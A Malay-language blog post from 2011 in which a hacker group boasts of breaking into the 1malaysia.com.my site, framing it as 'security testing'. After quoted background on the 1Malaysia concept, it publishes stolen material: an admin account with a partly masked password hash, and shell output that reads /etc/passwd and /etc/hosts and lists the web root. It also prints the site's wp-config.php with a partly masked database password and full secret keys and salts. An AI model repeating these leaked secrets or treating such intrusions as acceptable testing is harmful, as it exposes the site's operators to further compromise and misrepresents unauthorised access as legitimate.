#Title: laman 1malaysia.com.my digodam dan informasi dilepaskan
#Date: 27 July 2011
,ad8888ba, db 8b d8 ad88888ba 88888888888 ,ad8888ba,
d8"' `"8b d88b Y8, ,8P d8" "8b 88 d8"' `"8b
d8' d8'`8b Y8, ,8P Y8, 88 d8'
88 d8' `8b "8aa8" `Y8aaaaa, 88aaaaa 88
88 88888 d8YaaaaY8b `88' `"""""8b, 88""""" 88
Y8, 88 d8""""""""8b 88 `8b 88 Y8,
Y8a. .a88 d8' `8b 88 Y8a a8P 88 Y8a. .a8P
`"Y88888P" d8' `8b 88 "Y88888P" 88888888888 `"Y8888Y"' Net
assalamualaikum dan selamat sejahtera,
Terima kasih kerana melawat laman sesawang gaysec.net kami yang tidak seberapa ini.
Setelah beberapa hari menyepi kerana terlalu sibuk melakukan perkara yang jauh
lebih penting untuk kami lakukan, hari ini dan sekarang, kami kembali lagi untuk
memberikan anda maklumat dan informasi tentang ujian tahap keselamatan sesuatu
laman sesawang itu yang telah kami lakukan.
Sebentar tadi, kami mempunyai masa lapang untuk melakukan beberapa ujian tahap keselamatan
di atas laman sesawang perdana menteri malaysia kita, iaitu yang berhormat
`Dato's Sri Mohd Najib bin Abdul Razak`.
Laman sesawang beliau adalah 1malaysia.com.my.
Mungkin ramai di antara kita tahu tentang laman sesawang ini kan? laman sesawang
1malaysia.com.my adalah laman sesawang yang rasmi bagi perkataan "1Malaysia" di
dalam malaysia ini.
Berikut adalah maksud dan kefahaman mengenai 1Malaysia yang kami petik daripada wikipedia:
-----------------------------------------------------------------------------
1Malaysia atau 'Satu Malaysia' adalah satu gagasan peribadi yang diperkenalkan oleh
Perdana Menteri Malaysia keenam, Datuk Seri Najib Tun Razak pada 2 April 2009.
Intipati gagasan ini idea satu bangsa tanpa mengira kepelbagaian etnik, sub-etnik
dan kebudayaan. Semua pihak mestilah bersama-sama menjayakannya. Pelaksanaannya
bukan dibuat semalaman tetapi secara evolusi.
Ia adalah kesinambungan konsep daripada dua kepimpinan terdahulu dalam membawa
Malaysia menjadi sebuah negara maju.Ia adalah ramuan serta formula pentadbiran dalam
proses negara menuju Wawasan 2020 serta menjadi cemerlang, gemilang dan terbilang
seperti yang diperjuangkan perdana menteri keempat dan kelima iaitu Tun Dr Mahathir
Mohamad dan Tun Abdullah Ahmad Badawi.[1]
Aspek utama ialah sikap saling hormat menghormati dan bersikap menerima di antara
satu sama lain.Masyarakat majmuk di Malaysia perlu disatukan melalui '1Malaysia'.
Hubungan kaum dipereratkan bagi jangka masa panjang.[2] Tiada perbezaan antara bandar,
luar bandar dan kumpulan etnik sekiranya mereka mempunyai potensi berhak mendapat
bantuan kerajaan berbanding anak-anak golongan berada yang sudah tentu mempunyai
peluang pendidikan yang terbaik. Kerajaan menawarkan akses pemula dengan menyediakan
datar permainan yang adil tetapi kita sebagai kerajaan tidak berkemampuan memastikan
penghasilan yang sama. Prinsip utama yang mendasari 1Malaysia adalah kebersamaan dan
kekitaan dalam satu keluarga besar.[3]
Liberalisasi 27 aspek perkhidmatan juga menuju ke arah gagasan ini.[4]
-----------------------------------------------------------------------------
Tiada apa yang kami boleh terangkan disini, cuma kami agak kecewa dengan tahap keselamatan
di laman sesawang 1Malaysia perdana menteri kita, tidak sampai 1 jam kami lakukan ujian
keselamatan, kami telah banyak menjumpai kelemahah ke atas laman sesawang tersebut.
Jika setakat laman sesawang seperti ini pun kami berjaya melakukan ujian tahap keselamatan,
bagaimana pula dengan laman sesawang di malaysia ini yang lain?
Sedarkah anda? bahawa tahap keselamatan laman sesawang di malaysia ini adalah
tersangat-sangat rendah, kami agak kecewa dengan kecuaian dan ketidak pentingan
terhadap keselamatan sesuatu laman sesawang di malaysia ini.
Tidakkah anda risau? Jika suatu hari nanti, terdapat pengodam daripada negara jiran
dan luar daripada negara kita menceroboh laman sesawang yang jauh lebih penting dan
sulit daripada laman sesawang ini? tidakkah anda takut? jika suatu hari nanti ada
sesuatu pihak akan melakukannya untuk mendapatkan rahsia kerajaan di malaysia ini?
Allhualam, tiada siapa yang mengetahuinya, kerana itulah kami mula risau dengan tahap
keselamatan laman sesawang atau sistem itu di malaysia ini.
Dan, berita ini adalah kiriman terakhir kami sebelum bulan Ramadhan nanti, pada bulan
ramadhan nanti kami akan berhenti sementara daripada melakukan sebarang ujian tahap
keselamatan di sesuatu laman sesawang atau sistem itu sehinggalah setelah hari raya
aidilfitri tamat.
Mengenai berita ini, kami tidak akan melepaskan sebarang pangkalan data bagi laman
sesawang 1malaysia.com.my, kerana kami risau jika seseorang menggunakannya untuk
melakukan sesuatu yang tidak betul yang dapat dielakkan.
Contoh data yang telah kami dapat:
Username: 1madmin
Password:$P$BrBwSQvU8dobCxd90pQ5plSts***** (* = disembunyikan)
Name: Najib Razak
Email: admin@1malaysia.com.my
Anda boleh melihat senarai admin di laman 1malaysia.com.my melalui gambar dibawah:
http://www.gaysec.net/files/1malaysia-user.png (kata laluan di sembunyikan di atas keselamatan)
Berikut adalah informasi server/pelayan 1malaysia.com.my:
[skali@1malaysia /]$ uname -a
Linux 1malaysia.com.my 2.6.18-194.17.4.el5 #1 SMP Wed Oct 20 13:03:08 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[skali@1malaysia /]$ id
uid=500(skali) gid=500(skali) groups=500(skali) context=user_u:system_r:unconfined_t
[skali@1malaysia /]$ pwd
/home/1mcommy/public_html
[skali@1malaysia /]$ uptime
22:10:42 up 2 days, 21:42, 1 user, load average: 0.95, 1.04, 1.45
[skali@1malaysia /]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
skali:x:500:500::/home/skali:/bin/bash
1mteam:x:501:501:1Malaysia:/home/1mteam/public_html:/bin/bash
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sdirectory:x:503:503:Sport Directory:/home/sdirectory:/bin/sh
1mcommy:x:502:502:1mcommy:/home/1mcommy/public_html:/bin/bash
munin:x:101:103:Munin user:/var/lib/munin:/bin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
admin:x:504:504::/home/admin:/bin/sh
[skali@1malaysia /]$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
::1 localhost.localdomain localhost
192.168.96.78 1malaysia.com.my 1malaysia
202.186.96.78 1malaysia.com.my 1malaysia
[skali@1malaysia public_html]$ ls -al
total 23976
drwxr-xr-x 21 skali 1mcommy 4096 Jul 25 22:29 .
drwxr-xr-x 4 1mcommy 1mcommy 4096 Sep 15 2010 ..
drwxrwxrwx 4 skali skali 4096 May 15 19:56 1
-rw-r--r-- 1 skali skali 8156 Apr 5 12:15 34.html
-rw-r--r-- 1 skali skali 7773 Apr 5 12:34 35.html
-rw-r--r-- 1 skali skali 7522 Apr 5 12:24 3.html
-rwxr-xr-x 1 root root 754 Oct 12 2010 ab.p
-rw-r--r-- 1 skali skali 2180 Oct 12 2010 count.php
drwxr-xr-x 7 1mcommy 1mcommy 4096 Sep 26 2010 crm
drwxrwxr-x 8 skali skali 4096 Mar 11 18:40 demo
-rw-r--r-- 1 skali skali 44451 Dec 24 2010 demo.html
drwxr-xr-x 3 1mcommy 1mcommy 4096 Oct 6 2010 email-templates
drwxrwxr-x 4 skali skali 4096 Apr 8 12:13 fbfeedback
drwxrwxr-x 4 skali skali 4096 Apr 11 06:24 fbmbmb
drwxr-xr-x 4 skali skali 4096 Jun 3 14:59 fbpoll
drwxrwxr-x 5 skali skali 4096 Apr 1 15:16 fbvideo
drwxrwxr-x 6 skali skali 4096 Mar 30 01:15 feedback
-rwxr-xr-x 1 skali skali 5810 Apr 13 15:41 ga.php
-rw-r--r-- 1 skali skali 297 Jul 24 23:46 .htaccess
drwxr-xr-x 5 1mcommy 1mcommy 4096 Jul 5 08:00 images
-rwxr-xr-x 1 skali 1mcommy 739 Oct 12 2010 index.html
-rwxr-xr-x 1 skali 1mcommy 397 Jun 7 15:46 index.php
-rw-r--r-- 1 skali skali 2118 Feb 20 13:57 itvframe.php
-rwxr-xr-x 1 1mcommy 1mcommy 15606 Jun 7 15:48 license.txt
drwxr-xr-x 3 root root 4096 Oct 4 2010 old
drwxrwxr-x 2 skali skali 4096 Feb 20 13:26 onlinetv
-rw-r--r-- 1 skali skali 6546 Feb 20 12:59 onlinetv.js
-rw-r--r-- 1 skali skali 163313 Apr 23 04:43 prototype.js
drwxrwxr-x 4 skali skali 4096 Jun 15 13:49 r0undt4bl3
-rwxr-xr-x 1 1mcommy 1mcommy 9202 Jun 7 15:48 readme.html
drwxrwxr-x 4 skali skali 4096 Jun 13 00:04 roundtable
-rw-r--r-- 1 skali skali 9022 Feb 15 12:28 survey.php
-rw-r--r-- 1 1mcommy 1mcommy 722 Oct 6 2010 test.php
drwxr-xr-x 2 1mcommy 1mcommy 4096 May 5 16:05 tmp
drwxr-xr-x 7 skali root 4096 Oct 12 2010 v
-rwxr-xr-x 1 1mcommy 1mcommy 23667712 Sep 16 2010 wordpress.tar
-rwxr-xr-x 1 1mcommy 1mcommy 4337 Jun 7 15:48 wp-activate.php
drwxr-xr-x 9 1mcommy 1mcommy 4096 Jun 7 15:46 wp-admin
-rwxr-xr-x 1 1mcommy 1mcommy 40261 Jun 7 15:48 wp-app.php
-rwxr-xr-x 1 1mcommy 1mcommy 226 Jun 7 15:48 wp-atom.php
-rwxr-xr-x 1 1mcommy 1mcommy 274 Jun 7 15:48 wp-blog-header.php
-rwxr-xr-x 1 1mcommy 1mcommy 3931 Jun 7 15:48 wp-comments-post.php
-rwxr-xr-x 1 1mcommy 1mcommy 244 Jun 7 15:48 wp-commentsrss2.php
-rw-r--r-- 1 1mcommy 1mcommy 3518 May 15 19:56 wp-config.php
-rwxr-xr-x 1 1mcommy 1mcommy 3177 Jun 7 15:48 wp-config-sample.php
drwxr-xr-x 8 1mcommy 1mcommy 4096 Apr 20 15:26 wp-content
-rwxr-xr-x 1 1mcommy 1mcommy 1255 Jun 7 15:48 wp-cron.php
-rwxr-xr-x 1 1mcommy 1mcommy 246 Jun 7 15:48 wp-feed.php
drwxr-xr-x 9 1mcommy 1mcommy 4096 Jun 7 15:46 wp-includes
-rwxr-xr-x 1 1mcommy 1mcommy 1997 Jun 7 15:48 wp-links-opml.php
-rwxr-xr-x 1 1mcommy 1mcommy 2453 Jun 7 15:48 wp-load.php
-rwxr-xr-x 1 1mcommy 1mcommy 27816 Jun 7 15:48 wp-login.php
-rwxr-xr-x 1 1mcommy 1mcommy 7774 Jun 7 15:48 wp-mail.php
-rwxr-xr-x 1 1mcommy 1mcommy 494 Jun 7 15:48 wp-pass.php
-rwxr-xr-x 1 1mcommy 1mcommy 224 Jun 7 15:48 wp-rdf.php
-rwxr-xr-x 1 1mcommy 1mcommy 334 Jun 7 15:48 wp-register.php
-rwxr-xr-x 1 1mcommy 1mcommy 226 Jun 7 15:48 wp-rss2.php
-rwxr-xr-x 1 1mcommy 1mcommy 224 Jun 7 15:48 wp-rss.php
-rwxr-xr-x 1 1mcommy 1mcommy 9655 Jun 7 15:48 wp-settings.php
-rwxr-xr-x 1 1mcommy 1mcommy 18644 Jun 7 15:48 wp-signup.php
-rwxr-xr-x 1 1mcommy 1mcommy 3702 Jun 7 15:48 wp-trackback.php
-rwxr-xr-x 1 1mcommy 1mcommy 3210 Jun 7 15:48 xmlrpc.php
[skali@1malaysia /]$ cat wp-config.php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', '1M_WDB023');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'Y7suXkj=2P***');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'VFprj1RqqhIe6jyXZC0BcPqvZCeGUziMdIxvgw0Y05gSFjTPcKeHzNqNRapTpRpj');
define('SECURE_AUTH_KEY', '0iLn1SgZeO5VkDBgbuzl5SIcj5FJAhygSeVQzSPR9PzfpAzzgxfSNnCJfGbJ5fzN');
define('LOGGED_IN_KEY', 'hsjFygh86LkjaY8Dx3LfgRmsOQthv1yZT0acrmO0VJGeKU30Z8J6Lb9NBMomzFKr');
define('NONCE_KEY', 'Msojn9Ecp9qNpMqb1tdkYHHIUZT1xC3pnbYXCHFjvZzFALFQTaOrzAbvhFQIZuAA');
define('AUTH_SALT', 'r4QCX9nQdxNjjN5Z4geT0Nf5oT8KFMTk7rdxX2mq048eXsSKpvGx8UVd6HOe7wjM');
define('SECURE_AUTH_SALT', 'WQHqbpsZK1y9veQ67DAe5wpLPVLYbnX4J4fnipYhJnog4CJFxkj4TeR00cbRXZHE');
define('LOGGED_IN_SALT', 'eaI7YDxQrDTVywgxWjoEDVcjUdbOnfGaFsb7XASbJVzTaU07Iqlm0HLft7iGAFse');
define('NONCE_SALT', 'I0tPfY1aAhmSGW0GdyO61ROMSglKZDpK25icziZjfODBBn3eaSh8NeAZnAZvxi7c');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'k5r8_';
/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de.mo to wp-content/languages and set WPLANG to 'de' to enable German
* language support.
*/
define ('WPLANG', '');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
define('CONCATENATE_SCRIPTS', false);
/** Sets up WordPress vars and included files. */
define('WP_CACHE', true);
require_once(ABSPATH . 'wp-settings.php');
?>
0 org seni komen:
Catat Ulasan
KOMEN